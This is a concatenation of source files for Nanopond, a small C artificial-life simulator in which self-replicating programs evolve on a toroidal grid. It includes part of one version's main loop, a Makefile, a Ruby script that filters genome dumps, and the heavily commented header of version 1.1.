* Dumps all probable viable cells to a file called <clock>.dump
*
* @param clock Clock value
*/
static void doDump(const uint64_t clock)
{
char buf[POND_DEPTH*2];
FILE *d;
struct Cell *pptr;
uintptr_t x,y,i,val;
sprintf(buf,"%llu.dump.csv",clock);
d = fopen(buf,"w");
if (!d) {
fprintf(stderr,"[WARNING] Could not open %s for writing.\n",buf);
return;
}
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y) {
pptr = &pond[x][y];
fprintf(d,"%llu,%llu,%llu.%llu,",(uint64_t)x,(uint64_t)y,(uint64_t)pptr->ID,(uint64_t)pptr->generation);
val = valence(pptr->genome);
for(i=0;i<POND_DEPTH;++i)
fprintf(d,"%x",genomeAt(pptr->genome,i));
fprintf(d,",");
for(i=0;i<POND_DEPTH;++i)
fprintf(d,"%x",genomeAt(pptr->genome,i) ^ val);
fprintf(d,"\n");
}
}
fclose(d);
}
/**
* Get a neighbor in the pond
*
* @param x Starting X position
* @param y Starting Y position
* @param dir Direction to get neighbor from
* @return Pointer to neighboring cell
*/
static inline struct Cell *getNeighbor(const uintptr_t x,const uintptr_t y,const uintptr_t dir)
{
/* Space is toroidal; it wraps at edges */
switch(dir) {
case N_LEFT:
return (x) ? &pond[x-1][y] : &pond[POND_SIZE_X-1][y];
case N_RIGHT:
return (x < (POND_SIZE_X-1)) ? &pond[x+1][y] : &pond[0][y];
case N_UP:
return (y) ? &pond[x][y-1] : &pond[x][POND_SIZE_Y-1];
case N_DOWN:
return (y < (POND_SIZE_Y-1)) ? &pond[x][y+1] : &pond[x][0];
}
return &pond[x][y]; /* This should never be reached */
}
/**
* Determines if c1 is allowed to access c2
*
* @param c1 First cell attempting access
* @param c2 Cell c1 is attempting to access
* @return True or false (1 or 0)
*/
static inline int accessAllowed(struct Cell *const c1,struct Cell *const c2)
{
if (!isViableReplicator(c2->generation))
return 1;
const uintptr_t l1 = logo(c1->genome);
const uintptr_t l2 = logo(c2->genome);
if (l1 > l2)
return (getRandom() & 0xf) <= (l2 - l1);
else return (getRandom() & 0xf) <= (l1 - l2);
}
/**
* Gets the color that a cell should be
*
* @param c Cell to get color for
* @return 8-bit color value
*/
static inline uint8_t getColor(struct Cell *c)
{
uintptr_t i;
uintptr_t tmp,tmp2,val;
uint8_t color;
if (isViableReplicator(c->generation)) {
switch(colorScheme) {
case CHECKSUM:
/*
* Cells are color coded by genome checksum
*/
val = valence(c->genome);
color = (uint8_t)val;
tmp2 = 0;
for(i=EXEC_START_POSITION;i<POND_DEPTH;++i) {
tmp = genomeAt(c->genome,i) ^ val;
if ((tmp != 0xf)&&(tmp2 != 0xd))
color += (uint8_t)tmp; /* Ignore XCHG operands and STOPs */
tmp2 = tmp;
}
return color;
case LOGO:
/*
* Color code by logo
*
* Black is never used.
*/
return w3cPrimaryColors[logo(c->genome) + 1];
case VALENCE:
/*
* Color code by valence
*
* Black is never used.
*/
return w3cPrimaryColors[valence(c->genome) + 1];
case MAX_COLOR_SCHEME:
/* ... never used... to make compiler shut up. */
break;
}
}
return 0; /* Cells with no energy are black */
}
/**
* Main method
*
* @param argc Number of args
* @param argv Argument array
*/
int main(int argc,char **argv)
{
#ifdef SAVE_BMPS
char tmpbuf[1024];
#endif /* SAVE_BMPS */
uintptr_t i,x,y;
/* Seed and init the random number generator */
init_genrand(time(NULL));
for(i=0;i<1024;++i)
getRandom();
/* Reset per-report stat counters */
memset((void *)&statCounters,0,sizeof(statCounters));
/* Set up SDL if we're using it */
#ifdef USE_SDL
SDL_Surface *screen;
SDL_Event sdlEvent;
if (SDL_Init(SDL_INIT_VIDEO) < 0 ) {
fprintf(stderr,"*** Unable to init SDL: %s ***\n",SDL_GetError());
exit(1);
}
atexit(SDL_Quit);
SDL_WM_SetCaption("nanopond","nanopond");
screen = SDL_SetVideoMode(POND_SIZE_X,POND_SIZE_Y,8,SDL_SWSURFACE);
if (!screen) {
fprintf(stderr, "*** Unable to create SDL window: %s ***\n", SDL_GetError());
exit(1);
}
const uintptr_t sdlPitch = screen->pitch;
w3cPrimaryColors[0 ] = SDL_MapRGB(screen->format,0x00,0x00,0x00);
w3cPrimaryColors[1 ] = SDL_MapRGB(screen->format,0xb0,0xb0,0xb0);
w3cPrimaryColors[2 ] = SDL_MapRGB(screen->format,0x70,0x70,0x70);
w3cPrimaryColors[3 ] = SDL_MapRGB(screen->format,0xff,0xff,0xff);
w3cPrimaryColors[4 ] = SDL_MapRGB(screen->format,0x80,0x00,0x00);
w3cPrimaryColors[5 ] = SDL_MapRGB(screen->format,0xff,0x00,0x00);
w3cPrimaryColors[6 ] = SDL_MapRGB(screen->format,0x80,0x00,0x80);
w3cPrimaryColors[7 ] = SDL_MapRGB(screen->format,0xff,0x00,0xff);
w3cPrimaryColors[8 ] = SDL_MapRGB(screen->format,0x00,0x80,0x00);
w3cPrimaryColors[9 ] = SDL_MapRGB(screen->format,0x00,0xff,0x00);
w3cPrimaryColors[10] = SDL_MapRGB(screen->format,0x80,0x80,0x00);
w3cPrimaryColors[11] = SDL_MapRGB(screen->format,0xff,0xff,0x00);
w3cPrimaryColors[12] = SDL_MapRGB(screen->format,0x00,0x00,0x80);
w3cPrimaryColors[13] = SDL_MapRGB(screen->format,0x00,0x00,0xff);
w3cPrimaryColors[14] = SDL_MapRGB(screen->format,0x00,0x80,0x80);
w3cPrimaryColors[15] = SDL_MapRGB(screen->format,0x00,0xff,0xff);
w3cPrimaryColors[16] = SDL_MapRGB(screen->format,0x8b,0x45,0x13);
#endif /* USE_SDL */
/* Clear the pond and initialize all genomes
* to 0xffff... */
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y) {
pond[x][y].ID = 0ULL;
pond[x][y].generation = 0;
for(i=0;i<16;++i) {
#ifdef POND_ENERGY_VARIATION
pond[x][y].energy[i] = POND_ENERGY_BASE + (getRandom() % POND_ENERGY_VARIATION);
#else
pond[x][y].energy[i] = POND_ENERGY_BASE;
#endif /* POND_ENERGY_VARIATION */
}
for(i=0;i<(POND_DEPTH / INSTRUCTIONS_PER_UINTPTR);++i)
pond[x][y].genome[i] = 0;
}
}
/* Clock is incremented on each core loop */
uint64_t clock = 0ULL;
/* This is used to generate unique cell IDs */
uint64_t cellIdCounter = 1ULL;
/* Miscellaneous variables used in the loop */
uintptr_t ip,inst,tmp,val,correspondingVal;
struct Cell *pptr;
/* Memory pointer register */
uintptr_t ptr;
/* The main "register" */
uintptr_t reg;
/* Which way is the cell facing? */
uintptr_t facing;
/* Neighbors (precalculated at start) */
struct Cell *neighbor[4];
/* Is access allowed to the cell we're facing? This
* is calculated for each possible neighbor. */
uintptr_t facingAllowed[4];
/* Write counts are used to determine when a neighbor
* should be considered a "child." */
uintptr_t neighborWriteCounts[4];
/* Virtual machine loop/rep stack */
uintptr_t loopStack[POND_DEPTH];
uintptr_t loopStackPtr;
/* If this is nonzero, we're skipping to matching REP */
/* It is incremented to track the depth of a nested set
* of LOOP/REP pairs in false state. */
uintptr_t falseLoopDepth;
/* If this is nonzero, cell execution stops. This allows us
* to avoid the ugly use of a goto to exit the loop. :) */
int stop;
/* Main loop */
for(;;) {
/* Stop at STOP_AT if defined */
#ifdef STOP_AT
if (clock >= STOP_AT) {
/* Also do a final dump if dumps are enabled */
#ifdef DUMP_FREQUENCY
doDump(clock);
#endif /* DUMP_FREQUENCY */
fprintf(stderr,"[QUIT] STOP_AT clock value reached\n");
break;
}
#endif /* STOP_AT */
/* Increment clock and run reports periodically */
/* Clock is incremented at the start, so it starts at 1 */
if (!(++clock % REPORT_FREQUENCY)) {
doReport(clock);
/* SDL display is also refreshed every REPORT_FREQUENCY */
#ifdef USE_SDL
if (SDL_MUSTLOCK(screen))
SDL_LockSurface(screen);
while (SDL_PollEvent(&sdlEvent)) {
if (sdlEvent.type == SDL_QUIT) {
fprintf(stderr,"[QUIT] Quit signal received!\n");
exit(0);
} else if (sdlEvent.type == SDL_MOUSEBUTTONDOWN) {
switch (sdlEvent.button.button) {
case SDL_BUTTON_LEFT:
break;
case SDL_BUTTON_RIGHT:
colorScheme = (colorScheme + 1) % MAX_COLOR_SCHEME;
fprintf(stderr,"[INTERFACE] Switching to color scheme \"%s\".\n",colorSchemeName[colorScheme]);
for (y=0;y<POND_SIZE_Y;++y) {
for (x=0;x<POND_SIZE_X;++x)
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(&pond[x][y]);
}
break;
}
}
}
SDL_UpdateRect(screen,0,0,POND_SIZE_X,POND_SIZE_Y);
#ifdef SAVE_BMPS
sprintf(tmpbuf,"%llu.bmp",clock);
SDL_SaveBMP(screen,tmpbuf);
#endif /* SAVE_BMPS */
if (SDL_MUSTLOCK(screen))
SDL_UnlockSurface(screen);
#endif /* USE_SDL */
}
/* Periodically dump the viable population if defined */
#ifdef DUMP_FREQUENCY
if (!(clock % DUMP_FREQUENCY))
doDump(clock);
#endif /* DUMP_FREQUENCY */
/* Introduce a random cell somewhere with a given energy level */
/* This is called seeding, and introduces both energy and
* entropy into the substrate. This happens every INFLOW_FREQUENCY
* clock ticks. */
if (!(clock % INFLOW_FREQUENCY)) {
x = getRandom() % POND_SIZE_X;
y = getRandom() % POND_SIZE_Y;
pptr = &pond[x][y];
pptr->ID = cellIdCounter++;
pptr->generation = 0;
for(i=0;i<(POND_DEPTH / INSTRUCTIONS_PER_UINTPTR);++i)
pptr->genome[i] = getRandom();
/* Update the random cell on SDL screen if viz is enabled */
#ifdef USE_SDL
if (SDL_MUSTLOCK(screen))
SDL_LockSurface(screen);
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(pptr);
if (SDL_MUSTLOCK(screen))
SDL_UnlockSurface(screen);
#endif /* USE_SDL */
}
/* Pick a random cell to execute */
x = getRandom() % POND_SIZE_X;
y = getRandom() % POND_SIZE_Y;
pptr = &pond[x][y];
/* Don't execute empty cells */
if (!pptr->ID)
continue;
/* Reset the state of the VM prior to execution */
ptr = 0;
reg = 0;
loopStackPtr = 0;
ip = EXEC_START_POSITION;
facing = 0;
neighbor[0] = getNeighbor(x,y,0);
neighbor[1] = getNeighbor(x,y,1);
neighbor[2] = getNeighbor(x,y,2);
neighbor[3] = getNeighbor(x,y,3);
facingAllowed[0] = accessAllowed(pptr,neighbor[0]);
facingAllowed[1] = accessAllowed(pptr,neighbor[1]);
facingAllowed[2] = accessAllowed(pptr,neighbor[2]);
facingAllowed[3] = accessAllowed(pptr,neighbor[3]);
neighborWriteCounts[0] = 0;
neighborWriteCounts[1] = 0;
neighborWriteCounts[2] = 0;
neighborWriteCounts[3] = 0;
falseLoopDepth = 0;
stop = 0;
/* Get valence of this cell */
val = valence(pptr->genome);
correspondingVal = correspondingValence(val);
/* Keep track of how many cells have been executed */
statCounters.cellExecutions += 1.0;
/* Core execution loop */
while (!stop) {
/* Get next instruction, which is XORed with cell valence */
/* Cell valence determines instruction mapping! */
inst = genomeAt(pptr->genome,ip) ^ val;
/* Randomly frob either the instruction or the register with a
* probability defined by MUTATION_RATE. This introduces variation,
* and since the variation is introduced into the state of the VM
* it can have all manner of different effects on the end result of
* replication: insertions, deletions, duplications of entire
* ranges of the genome, etc. */
if ((getRandom() & 0xffffffff) < MUTATION_RATE) {
tmp = getRandom(); /* Call getRandom() only once for speed */
if (tmp & 0x1000) /* Check for a high bit to get random boolean */
inst = tmp & INSTRUCTION_MASK;
else reg = tmp & INSTRUCTION_MASK;
}
/* Each instruction processed converts one unit of energy into energy
* of the corresponding valence. */
if (!pptr->energy[val])
break;
else --pptr->energy[val];
++pptr->energy[correspondingVal];
/* Execute the instruction */
if (falseLoopDepth) {
/* Skip forward to matching REP if we're in a false loop. */
if (inst == 0xa) /* Increment false LOOP depth */
++falseLoopDepth;
else if (inst == 0xb) /* Decrement on REP */
--falseLoopDepth;
} else {
/* If we're not in a false LOOP/REP, execute normally */
/* Keep track of execution frequencies for each instruction */
statCounters.instructionExecutions[inst] += 1.0;
switch(inst) {
case 0x0: /* ZERO: Zero VM state registers */
reg = 0;
ptr = 0;
facing = 0;
break;
case 0x1: /* FWD: Increment the pointer (wrap at end), set reg==0 on wrap */
if (++ptr >= POND_DEPTH) {
ptr = 0;
reg = 0;
} else reg = 1;
break;
case 0x2: /* BACK: Decrement the pointer (wrap at beginning), set reg==0 on wrap */
if (ptr) {
--ptr;
reg = 1;
} else {
ptr = POND_DEPTH - 1;
reg = 0;
}
break;
case 0x3: /* INC: Increment the register */
reg = (reg + 1) & INSTRUCTION_MASK;
break;
case 0x4: /* DEC: Decrement the register */
reg = (reg - 1) & INSTRUCTION_MASK;
break;
case 0x5: /* MASK: XOR register with valence */
reg ^= val;
break;
case 0x6: /* READG: Read into the register from genome */
reg = genomeAt(pptr->genome,ptr);
break;
case 0x7: /* WRITEG: Write out from the register to genome */
genomeSet(pptr->genome,ptr,reg);
break;
case 0x8: /* READB: Read into the register from buffer */
if (facingAllowed[facing])
reg = genomeAt(neighbor[facing]->genome,ptr);
else reg = 0;
break;
case 0x9: /* WRITEB: Write out from the register to buffer */
if (facingAllowed[facing]) {
if (++neighborWriteCounts[facing] >= 4) {
/* Writes of more than 4 values are considered an "offspring" */
neighbor[facing]->ID = cellIdCounter++;
neighbor[facing]->generation = pptr->generation + 1;
}
genomeSet(neighbor[facing]->genome,ptr,reg);
}
break;
case 0xa: /* LOOP: Jump forward to matching REP if register is zero */
if (reg) {
if (loopStackPtr >= POND_DEPTH)
stop = 1; /* Stack overflow ends execution */
else loopStack[loopStackPtr++] = ip;
} else falseLoopDepth = 1;
break;
case 0xb: /* REP: Jump back to matching LOOP if register is nonzero */
if (loopStackPtr) {
if (reg) {
ip = loopStack[--loopStackPtr];
/* This ensures that the LOOP is rerun */
continue;
} else --loopStackPtr;
}
break;
case 0xc: /* TURN: Turn in the direction specified by register */
facing = reg & 3; /* Four cardinal directions */
break;
case 0xd: /* XCHG: Skip next instruction and exchange value of register with it */
if (++ip < POND_DEPTH) {
tmp = reg;
reg = genomeAt(pptr->genome,ip);
genomeSet(pptr->genome,ip,tmp);
}
break;
case 0xe: /* SHARE: Equalize energy between self and neighbor if allowed */
if (facingAllowed[facing]) {
if (isViableReplicator(neighbor[facing]->generation))
++statCounters.viableCellShares;
tmp = pptr->energy[val] + neighbor[facing]->energy[val];
neighbor[facing]->energy[val] = tmp / 2;
pptr->energy[val] = tmp - neighbor[facing]->energy[val];
}
break;
case 0xf: /* STOP: End execution */
stop = 1;
break;
}
}
if (++ip >= POND_DEPTH)
break;
}
/* If the cell runs out of energy of it's valence, it "dies." */
if (!pptr->energy[val]) {
pptr->ID = 0ULL;
pptr->generation = 0;
for(i=0;i<(POND_DEPTH / INSTRUCTIONS_PER_UINTPTR);++i)
pptr->genome[i] = 0;
}
/* Update the neighborhood on SDL screen to show any changes. */
#ifdef USE_SDL
if (SDL_MUSTLOCK(screen))
SDL_LockSurface(screen);
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(pptr);
if (x) {
((uint8_t *)screen->pixels)[(x-1) + (y * sdlPitch)] = getColor(&pond[x-1][y]);
if (x < (POND_SIZE_X-1))
((uint8_t *)screen->pixels)[(x+1) + (y * sdlPitch)] = getColor(&pond[x+1][y]);
else ((uint8_t *)screen->pixels)[y * sdlPitch] = getColor(&pond[0][y]);
} else {
((uint8_t *)screen->pixels)[(POND_SIZE_X-1) + (y * sdlPitch)] = getColor(&pond[POND_SIZE_X-1][y]);
((uint8_t *)screen->pixels)[1 + (y * sdlPitch)] = getColor(&pond[1][y]);
}
if (y) {
((uint8_t *)screen->pixels)[x + ((y-1) * sdlPitch)] = getColor(&pond[x][y-1]);
if (y < (POND_SIZE_Y-1))
((uint8_t *)screen->pixels)[x + ((y+1) * sdlPitch)] = getColor(&pond[x][y+1]);
else ((uint8_t *)screen->pixels)[x] = getColor(&pond[x][0]);
} else {
((uint8_t *)screen->pixels)[x + ((POND_SIZE_Y-1) * sdlPitch)] = getColor(&pond[x][POND_SIZE_Y-1]);
((uint8_t *)screen->pixels)[x + sdlPitch] = getColor(&pond[x][1]);
}
if (SDL_MUSTLOCK(screen))
SDL_UnlockSurface(screen);
#endif /* USE_SDL */
}
return 0;
}
<file_sep>all:
cc -I/usr/local/include -L/usr/local/lib -Ofast -o nanopond nanopond.c -lSDL2 -lpthread
clean:
rm -rf *.o nanopond *.dSYM
<file_sep>#!/usr/bin/ruby
#
# This script is an extremely pessimistic filter designed to yield
# in binary format a sorted set of all unique, likely to be viable,
# whole genome programs in the substrate.
#
# It is designed to be used in tandem with further compression by a
# program like bzip2 to generate an estimate of the number of unique
# nonredundant bits of viable genome information in the substrate.
#
# Discard genomes for which there are less than this many copies
# These are likely non-viable offspring.
$COUNT_THRESHOLD = 3
# Discard genomes smaller than this, since genomes smaller than this
# simply could not have a functional copy loop.
$SIZE_THRESHOLD = 5
# This hash will contain genomes and how many times they were seen.
specimens = Hash.new
$stdin.each { |csv|
csv.strip!
# CSV file format: ID,parentID,lineage,generation,genome
specimen = csv.split(',')
if specimen.size == 5
# Column four is the actual genome program in hex
genome = specimen[4]
genome.strip!
# Strip the first character since that's the "logo" and is not an
# instruction.
genome.gsub!(/^./,'')
# Strip the argument of the XCHG instruction since that is not
# technically an instruction.
genome.gsub!(/c./,'c')
# Strip anything after the first STOP instruction to include only
# instructions that are *definitely* functional.
genome.gsub!(/f.*/,'')
# Count how many instances of the given genome pattern there are
# using this hash.
genome.freeze
specimens[genome] = specimens[genome].to_i + 1
end
}
# Delete genome strings for which there are less than the
# count threshold copies or which are too small.
specimens.delete_if { |genome,cnt| ((cnt < $COUNT_THRESHOLD) or (genome.length < $SIZE_THRESHOLD)) }
# Get a sorted array of all genome strings
genomes = specimens.keys
genomes.sort!
# Remove genome strings that are substrings of other ones (probably
# abortive reproduction attempts). This leaves only unique genomes
# that appear to be "whole specimens."
wholeGenomes = Array.new
genomes.each { |g|
whole = true
genomes.each { |g2|
# It's not a "whole genome" if it's a substring of another and
# is shorter than that one.
if ((not g2.index(g).nil?) and (g.length < g2.length))
whole = false
break
end
}
wholeGenomes << g if whole
}
genomes = wholeGenomes
# Sanity check
exit unless genomes.size > 0
# Concatenate it all together into one big hexadecimal string
allGenomes = String.new
genomes.each { |genome|
allGenomes << genome
}
# Output each pair of four-bit words as a single eight-bit byte
tmp = String.new
allGenomes.split(//).each { |b|
tmp << b
if tmp.length == 2
$stdout.putc(tmp.to_i(16))
tmp.chop!
tmp.chop!
end
}
# Output the last four bits if there is an odd number of four-bit words.
if tmp.length == 1
$stdout.putc(tmp.to_i(16))
end
<file_sep>/* *********************************************************************** */
/* */
/* Nanopond version 1.1 -- A teeny tiny artificial life virtual machine */
/* Copyright (C) 2005 <NAME> - http://www.greythumb.org/people/api */
/* Copyright (C) 2005 <NAME> - http://falma.de/ */
/* */
/* This program is free software; you can redistribute it and/or modify */
/* it under the terms of the GNU General Public License as published by */
/* the Free Software Foundation; either version 2 of the License, or */
/* (at your option) any later version. */
/* */
/* This program is distributed in the hope that it will be useful, */
/* but WITHOUT ANY WARRANTY; without even the implied warranty of */
/* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the */
/* GNU General Public License for more details. */
/* */
/* You should have received a copy of the GNU General Public License */
/* along with this program; if not, write to the Free Software */
/* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110 USA */
/* */
/* *********************************************************************** */
/*
Changes in 1.1:
* Changed EAT to SHARE.
* Different color schemes (switch with right mouse button)
* Dumping of genomes of single cells to stderr (press left mouse button)
* Random number generator called only once per command
* Replaced INFLOW_RATE_MEAN and INFLOW_RATE_DEVIATION by INFLOW_RATE_BASE
and INFLOW_RATE_VARIATION. Same effect but a little bit faster.
*/
/*
* Nanopond is just what it says: a very very small and simple artificial
* life virtual machine.
*
* It is a "small evolving program" based artificial life system of the same
* general class as Tierra, Avida, and Archis. It is written in very tight
* and efficient C code to make it as fast as possible, and is so small that
* it consists of only one .c file.
*
* How Nanopond works:
*
* The Nanopond world is called a "pond." It is an NxN two dimensional
* array of Cell structures, and it wraps at the edges (it's toroidal).
* Each Cell structure consists of a few attributes that are there for
* statistics purposes, an energy level, and an array of POND_DEPTH
* four-bit values. (The four-bit values are actually stored in an array
* of machine-size words.) The array in each cell contains the genome
* associated with that cell, and POND_DEPTH is therefore the maximum
* allowable size for a cell genome.
*
* The first four bit value in the genome is called the "logo." What that is
* for will be explained later. The remaining four bit values each code for
* one of 16 instructions. Instruction zero (0x0) is NOP (no operation) and
* instruction 15 (0xf) is STOP (stop cell execution). Read the code to see
* what the others are. The instructions are exceptionless and lack fragile
* operands. This means that *any* arbitrary sequence of instructions will
* always run and will always do *something*. This is called an evolvable
* instruction set, because programs coded in an instruction set with these
* basic characteristics can mutate. The instruction set is also
* Turing-complete, which means that it can theoretically do anything any
* computer can do. If you're curious, the instruciton set is based on this:
* http://www.muppetlabs.com/~breadbox/bf/
*
* At the center of Nanopond is a core loop. Each time this loop executes,
* a clock counter is incremented and one or more things happen:
*
* - Every REPORT_FREQUENCY clock ticks a line of comma seperated output
* is printed to STDOUT with some statistics about what's going on.
* - Every DUMP_FREQUENCY clock ticks, all viable replicators (cells whose
* generation is >= 2) are dumped to a file on disk.
* - Every INFLOW_FREQUENCY clock ticks a random x,y location is picked,
* energy is added (see INFLOW_RATE_BASE and INFLOW_RATE_VARIATION)
* and it's genome is filled with completely random bits. Statistics
* are also reset to generation==0 and parentID==0 and a new cell ID
* is assigned.
* - Every tick a random x,y location is picked and the genome inside is
* executed until a STOP instruction is encountered or the cell's
* energy counter reaches zero. (Each instruction costs one unit energy.)
*
* The cell virtual machine is an extremely simple register machine with
* a single four bit register, one memory pointer, one spare memory pointer
* that can be exchanged with the main one, and an output buffer. When
* cell execution starts, this output buffer is filled with all binary 1's
* (0xffff....). When cell execution is finished, if the first byte of
* this buffer is *not* 0xff, then the VM says "hey, it must have some
* data!". This data is a candidate offspring; to reproduce cells must
* copy their genome data into the output buffer.
*
* When the VM sees data in the output buffer, it looks at the cell
* adjacent to the cell that just executed and checks whether or not
* the cell has permission (see below) to modify it. If so, then the
* contents of the output buffer replace the genome data in the
* adjacent cell. Statistics are also updated: parentID is set to the
* ID of the cell that generated the output and generation is set to
* one plus the generation of the parent.
*
* A cell is permitted to access a neighboring cell if:
* - That cell's energy is zero
* - That cell's parentID is zero
* - That cell's logo (remember?) matches the trying cell's "guess"
*
* Since randomly introduced cells have a parentID of zero, this allows
* real living cells to always replace them or share energy with them.
*
* The "guess" is merely the value of the register at the time that the
* access attempt occurs.
*
* Permissions determine whether or not an offspring can take the place
* of the contents of a cell and also whether or not the cell is allowed
* to SHARE (an instruction) the energy with it's neighbor.
*
* If you haven't realized it yet, this is why the final permission
* criteria is comparison against what is called a "guess." In conjunction
* with the ability to "share" neighbors' energy, guess what this permits?
*
* Since this is an evolving system, there have to be mutations. The
* MUTATION_RATE sets their probability. Mutations are random variations
* with a frequency defined by the mutation rate to the state of the
* virtual machine while cell genomes are executing. Since cells have
* to actually make copies of themselves to replicate, this means that
* these copies can vary if mutations have occurred to the state of the
* VM while copying was in progress.
*
* What results from this simple set of rules is an evolutionary game of
* "corewar." In the beginning, the process of randomly generating cells
* will cause self-replicating viable cells to spontaneously emerge. This
* is something I call "random genesis," and happens when some of the
* random gak turns out to be a program able to copy itself. After this,
* evolution by natural selection takes over. Since natural selection is
* most certainly *not* random, things will start to get more and more
* ordered and complex (in the functional sense). There are two commodities
* that are scarce in the pond: space in the NxN grid and energy. Evolving
* cells compete for access to both.
*
* If you want more implementation details such as the actual instruction
* set, read the source. It's well commented and is not that hard to
* read. Most of it's complexity comes from the fact that four-bit values
* are packed into machine size words by bit shifting. Once you get that,
* the rest is pretty simple.
*
* Nanopond, for it's simplicity, manifests some really interesting
* evolutionary dynamics. While I haven't run the kind of multiple-
* month-long experiment necessary to really see this (I might!), it
* would appear that evolution in the pond doesn't get "stuck" on just
* one or a few forms the way some other simulators are apt to do.
* I think simplicity is partly reponsible for this along with what
* biologists call embeddedness, which means that the cells are a part
* of their own world.
*
* Run it for a while... the results can be... interesting!
*
* Running Nanopond:
*
* Nanopond can use SDL (Simple Directmedia Layer) for screen output. If
* you don't have SDL, comment out USE_SDL below and you'll just see text
* statistics and get genome data dumps. (Turning off SDL will also speed
* things up slightly.)
*
* After looking over the tunable parameters below, compile Nanopond and
* run it. Here are some example compilation commands from Linux:
*
* For Pentiums:
* gcc -O6 -march=pentium -funroll-loops -fomit-frame-pointer -s
* -o nanopond nanopond.c -lSDL
*
* For Athlons with gcc 4.0+:
* gcc -O6 -msse -mmmx -march=athlon -mtune=athlon -ftree-vectorize
* -funroll-loops -fomit-frame-pointer -o nanopond nanopond.c -lSDL
*
* The second line is for gcc 4.0 or newer and makes use of GCC's new
* tree vectorizing feature. This will speed things up a bit by
* compiling a few of the loops into MMX/SSE instructions.
*
* This should also work on other Posix-compliant OSes with relatively
* new C compilers. (Really old C compilers will probably not work.)
* On other platforms, you're on your own! On Windows, you will probably
* need to find and download SDL if you want pretty graphics and you
* will need a compiler. MinGW and Borland's BCC32 are both free. I
* would actually expect those to work better than Microsoft's compilers,
* since MS tends to ignore C/C++ standards. If stdint.h isn't around,
* you can fudge it like this:
*
* #define uintptr_t unsigned long (or whatever your machine size word is)
* #define uint8_t unsigned char
* #define uint64_t unsigned long long (or whatever is a 64-bit int)
*
* When Nanopond runs, comma-seperated stats (see doReport() for
* the columns) are output to stdout and various messages are output
* to stderr. For example, you might do:
*
* ./nanopond >>stats.csv 2>messages.txt &
*
* To get both in seperate files.
*
* Have fun!
*/
/* ----------------------------------------------------------------------- */
/* Tunable parameters */
/* ----------------------------------------------------------------------- */
/* If this is defined, one is dropped occasionally into the world */
/* This is only for debugging, and makes things less interesting.
* You should probably leave it undefined. */
/* #define SYNTHETIC_REPLICATOR 1 */
/* Frequency of comprehensive reports-- lower values will provide more
* info while slowing down the simulation. Higher values will give less
* frequent updates. The default of 250000 is good on a 2ghz Athlon.
* This is also the frequency of screen refreshes if SDL is enabled. */
#define REPORT_FREQUENCY 500000
/* Frequency at which to dump all viable replicators (generation > 2)
* to a file named <clock>.dump in the current directory. Comment
* out to disable. The cells are dumped in hexadecimal, which is
* semi-human-readable if you look at the big switch() statement
* in the main loop to see what instruction is signified by each
* four-bit value. */
#define DUMP_FREQUENCY 100000000
/* Mutation rate -- range is from 0 (none) to 0xffffffff (all mutations!) */
/* To get it from a float probability from 0.0 to 1.0, multiply it by
* 4294967295 (0xffffffff) and round. */
// #define MUTATION_RATE 42949 /* p=~0.00001 */
#define MUTATION_RATE 128849*10 /* p=~0.0003 */
/* #define MUTATION_RATE 429496 /\* p=~0.0001 *\/ */
/* How frequently should random cells / energy be introduced?
* Making this too high makes things very chaotic. Making it too low
* might not introduce enough energy. */
#define INFLOW_FREQUENCY 100
/* Base amount of energy to introduce every INFLOW_FREQUENCY ticks. */
#define INFLOW_RATE_BASE 6000
/* A random amount of energy not bigger than this value will be added to
INFLOW_RATE_BASE. */
#define INFLOW_RATE_VARIATION 8000
/* Size of pond in X and Y dimensions. */
#define POND_SIZE_X 600
#define POND_SIZE_Y 400
/* Depth of pond in four-bit codons -- this is the maximum
* genome size. This *must* be a multiple of 16! */
#define POND_DEPTH 512
/* Define this to use SDL. To use SDL, you must have SDL headers
* available and you must link with the SDL library when you compile. */
/* Comment this out to compile without SDL visualization support. */
#define USE_SDL 1
/* ----------------------------------------------------------------------- */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef USE_SDL
#ifdef _MSC_VER
#include <SDL.h>
#else
#include <SDL/SDL.h>
#endif /* _MSC_VER */
#endif /* USE_SDL */
/* Pond depth in machine-size words. This is calculated from
* POND_DEPTH and the size of the machine word. (The multiplication
* by two is due to the fact that there are two four-bit values in
* each eight-bit byte.) */
#define POND_DEPTH_SYSWORDS (POND_DEPTH / (sizeof(uintptr_t) * 2))
/* Number of bits in a machine-size word */
#define SYSWORD_BITS (sizeof(uintptr_t) * 8)
/* Constants representing neighbors in the 2D grid. */
#define N_LEFT 0
#define N_RIGHT 1
#define N_UP 2
#define N_DOWN 3
/**
* Structure for a cell in the pond
*/
struct Cell
{
/* Globally unique cell ID */
uint64_t ID;
/* ID of the cell's parent */
uint64_t parentID;
/* Generations start at 0 and are incremented from there. */
uintptr_t generation;
/* Energy level of this cell */
uintptr_t energy;
/* Memory space for cell genome (genome is stored as four
* bit instructions packed into machine size words) */
uintptr_t genome[POND_DEPTH_SYSWORDS];
};
/* The pond is a 2D array of cells */
struct Cell pond[POND_SIZE_X][POND_SIZE_Y];
/* This adds to __randCounter so that getRandom() will span
* all 64 bits even if rand() is 32-bit on 64-bit boxes. */
static uintptr_t __randCounter = 0; /* Both of these are set to time() */
static uintptr_t __randState = 0;
/* Note that rand_r() is faster even though we're not multithreaded. If
* you get errors about rand_r not being defined, change it to rand() or
* go find a better PRNG like Mersenne Twister and link against that. */
#define getRandom() (__randCounter += (uintptr_t)rand_r(&__randState))
enum { MIXED, KINSHIP, MAX_COLOR_SCHEME } color_scheme = MIXED;
char *color_scheme_names[] = {"mixed", "relation-dependant"};
/**
* Output a line of comma-seperated statistics data
*
* @param clock Current clock
*/
static void doReport(const uint64_t clock)
{
static uint64_t lastTotalViableReplicators = 0;
uintptr_t x,y;
uint64_t totalActiveCells = 0;
uint64_t totalEnergy = 0;
uint64_t totalViableReplicators = 0;
uintptr_t maxGeneration = 0;
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y) {
struct Cell *const c = &pond[x][y];
if (c->energy) {
++totalActiveCells;
totalEnergy += (uint64_t)c->energy;
if (c->generation > 2)
++totalViableReplicators;
